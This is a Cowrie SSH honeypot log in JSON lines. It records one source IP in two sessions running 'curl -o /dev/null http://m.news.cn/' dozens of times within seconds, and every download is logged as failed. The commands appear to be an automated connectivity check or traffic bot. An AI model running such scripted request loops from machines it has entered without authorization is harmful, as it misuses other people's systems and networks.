{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.222693Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.241135Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.242290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.259936Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.261061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.284708Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.287485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.288383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.305628Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.414435Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.415687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.443640Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.461581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.462623Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.465250Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.496572Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.498093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.507640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.508660Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.534764Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.536033Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.548724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.549743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.568312Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.585633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.590086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.590929Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.598460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.599269Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.608555Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.627598Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.646637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.647313Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.649374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.650227Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.666388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.682980Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.693312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.694174Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.696004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.696748Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.750101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.751209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.754874Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.755961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.810992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.811970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.817482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.818211Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.853722Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.855545Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.873635Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.874645Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.882853Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.883789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.914777Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.916635Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.937634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.938808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.951668Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.952689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.972093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.973224Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.006181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.007266Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.020268Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.021149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.029257Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.030431Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.092675Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.093858Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.099414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.100270Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.109748Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.110640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.152380Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.153387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.155397Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.157831Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.163976Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.164893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.200463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.201521Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.212415Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.213764Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.264432Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.265971Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.310217Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.311640Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.360991Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.363065Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.393255Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.394391Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.419345Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.427577Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.428502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.443955Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.451287Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.452262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.468289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.470490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.502201Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.506035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.507212Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.511189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.514064Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.524779Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.553805Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.554873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.557009Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.560045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.561172Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.614276Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.635065Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.671270Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.715190Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.717187Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.736462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.737497Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:58.740145Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.741132Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.760014Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.862792Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.866496Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.927704Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.973394Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:58.975309Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
